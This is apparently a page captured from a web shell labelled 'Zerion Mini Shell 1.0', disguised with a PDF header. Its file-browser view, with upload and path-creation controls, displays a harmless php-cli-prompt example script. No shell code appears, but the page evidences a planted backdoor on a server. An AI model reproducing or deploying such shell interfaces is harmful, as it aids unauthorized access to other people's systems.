%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/share/doc/php-cli-prompt/examples/
Upload File :
Create Path :
Current File : //usr/share/doc/php-cli-prompt/examples/example.php

<?php

require 'Seld/CliPrompt/autoload.php';

echo 'Say hello (visible): ';

$answer = Seld\CliPrompt\CliPrompt::prompt();

echo 'You answered: '.$answer . PHP_EOL;

echo 'Say hello (hidden): ';

$answer = Seld\CliPrompt\CliPrompt::hiddenPrompt();

echo 'You answered: '.$answer . PHP_EOL;

Zerion Mini Shell 1.0